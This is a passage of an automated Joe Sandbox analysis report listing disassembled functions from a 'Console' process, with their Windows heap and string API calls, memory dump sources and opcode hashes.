                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: 07c653d3cf1ed305c222cec6033f1366b560f964025f88d3db0797a4f360e0dd
                                                                                                                                                                                                                          • Instruction ID: 24444342ebe00e6896768aa8436f2afe5c4a04a505b6f1ef573e208ffdedc9a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c653d3cf1ed305c222cec6033f1366b560f964025f88d3db0797a4f360e0dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B17D74A107268FDB26CF19D880769B7B9FF48710F1881E9D909AB750DB35AE91CF80
                                                                                                                                                                                                                          Function 01086910 Relevance: 5.2, APIs: 4, Instructions: 227memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 010869C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01086A1C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01086B77
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EF94,?,?,?,?,?,?,?,?,?), ref: 01086BA6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$CloseCriticalHandleLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1789390409-0
                                                                                                                                                                                                                          • Opcode ID: d624aa2630b89200165f6af8c5e327745d071772675a3286eae1323c747cf255
                                                                                                                                                                                                                          • Instruction ID: 8f8558402669fcf64c8f7c4a8b17a4f2f9081b57204498e30a2022aa22f92c6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d624aa2630b89200165f6af8c5e327745d071772675a3286eae1323c747cf255
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C791F670604201CFEB21EF28CC84BA97BA4AF50714F0941B9EDC9AF3D5DB76A850CB61
                                                                                                                                                                                                                          Function 010A84C0 Relevance: 5.2, APIs: 4, Instructions: 226stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,7CAB6A82,?,FFFFFFFF), ref: 010A85EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 39653677-0
                                                                                                                                                                                                                          • Opcode ID: 3b489016d69b27dfb5f9257a5d2f55601629c4ac19ab6d9907abbd74e2be7e3e
                                                                                                                                                                                                                          • Instruction ID: d997ba4e82bddf285253f072d3b55aa5cd0c673061c8ce6d323d2a63d29328fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b489016d69b27dfb5f9257a5d2f55601629c4ac19ab6d9907abbd74e2be7e3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EA16AB0901258DFEB60DF69C988B9EBBF4FF08304F1081DAD449A7290EB759A84CF51
                                                                                                                                                                                                                          Function 01136710 Relevance: 5.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136802
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136876
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 0113698C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$_errno$wcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1319467083-0
                                                                                                                                                                                                                          • Opcode ID: c0b2b8f9e57a49c88c9955e99eea2222ab0432bfa234773b37f1255b31b74961
                                                                                                                                                                                                                          • Instruction ID: 4128038f3fd1d742ee318ff571197da48a6ab2d3b31691a6b4250b1202ed36ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b2b8f9e57a49c88c9955e99eea2222ab0432bfa234773b37f1255b31b74961
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E819D70E01288EFEB19CFE8C9547DDBBB5AF84714F104169D911BB388D7B5AA08CB91
                                                                                                                                                                                                                          Function 012D85E0 Relevance: 5.2, APIs: 4, Instructions: 165memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 012D8649
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010,?,00000000), ref: 012D8666
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000004), ref: 012D87C3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2113670309-0
                                                                                                                                                                                                                          • Opcode ID: 7025d51a039d960e3c6b6259a3a9994b17ac671c4a0676a15e4feb0ba1cf73c7
                                                                                                                                                                                                                          • Instruction ID: 3837777eb43b4cac7a9b9a6e0c8aaaae7c786e7a02c4cd030aaef16f0dfe6a5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7025d51a039d960e3c6b6259a3a9994b17ac671c4a0676a15e4feb0ba1cf73c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF51F4B4B102199FEB24DF28CC40BAA77A4EF54310F0180BDEB49EB351DB709995CB94
                                                                                                                                                                                                                          Function 012D0490 Relevance: 5.2, APIs: 4, Instructions: 160memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,012D48E2,00000000), ref: 012D04A7
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000038,00000000,?,00000000,012D48E2,00000000), ref: 012D04C4
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 012D0504
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D0606
                                                                                                                                                                                                                            • Part of subcall function 012CC070: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,012D5387,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012CC072
                                                                                                                                                                                                                            • Part of subcall function 012CC440: GetProcessHeap.KERNEL32(7CAB6A82,00000000,?,?,?,?,?,?,?,?,?,014F3C95,000000FF,?,012D4EF6,00000000), ref: 012CC478
                                                                                                                                                                                                                            • Part of subcall function 012CC440: HeapAlloc.KERNEL32(03BF0000,00000000,00000008,7CAB6A82,00000000,?,?,?,?,?,?,?,?,?,014F3C95,000000FF), ref: 012CC495
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmalloc$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3221293056-0
                                                                                                                                                                                                                          • Opcode ID: 65e5637f6f8be35c611fc06c4a0b0e1193d37ffa614b25bd9c77dcf7da530fa8
                                                                                                                                                                                                                          • Instruction ID: 4edc830c612ab4489db2606a78299c9f7529c3d3eaf1ab95ce69da085dee5765
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65e5637f6f8be35c611fc06c4a0b0e1193d37ffa614b25bd9c77dcf7da530fa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051B2717107028FE731DF6DD840716BBE0EF94715F20462DEA598B7A0EB71A814CB95
                                                                                                                                                                                                                          Function 012DB1E0 Relevance: 5.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,012D7542), ref: 012DB35C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 669e2ae45b58e6b7f33c2a7f48b649057ea53d1956a63a8d73058686854c8e56
                                                                                                                                                                                                                          • Instruction ID: 9ce14b9c79ea202a8fbeafd9787c721426d13c3e4bd412ee32798da78e0ffb95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 669e2ae45b58e6b7f33c2a7f48b649057ea53d1956a63a8d73058686854c8e56
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70414571E20606ABEB61CF6DCC547AEBBE4AF56700F02812DEA45D7350EB709854C7D0
                                                                                                                                                                                                                          Function 012D5340 Relevance: 5.1, APIs: 4, Instructions: 141stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(0159D260,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D53B8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D5485
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D5495
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$strcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 507678545-0
                                                                                                                                                                                                                          • Opcode ID: 26017806f4e9855cd1bcaef1984819433de4b3af2988bcfa487be96932a9568d
                                                                                                                                                                                                                          • Instruction ID: 13437103097fab84567fd91c708093ed01b684ed911a2d9ce24047853ed41bf8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26017806f4e9855cd1bcaef1984819433de4b3af2988bcfa487be96932a9568d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41D371B207129BDB219F29DC00A2AF7F5FF84712F08462DEE5997250EBB1D8148B92
                                                                                                                                                                                                                          Function 012D6020 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6082
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D608C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2190258309-0
                                                                                                                                                                                                                          • Opcode ID: 7625221f1c9f0806141df1645f9f9a2b8b666322605e8b8d18475ff20cd9b805
                                                                                                                                                                                                                          • Instruction ID: 9866cda29e5526b26932079dc9b656ac7943326ef8d00303a0e36ae65f81a039
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7625221f1c9f0806141df1645f9f9a2b8b666322605e8b8d18475ff20cd9b805
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C0124B17002125BEA049B68E80866B7771FFC1227F24453DF606D3360EB26A46187E2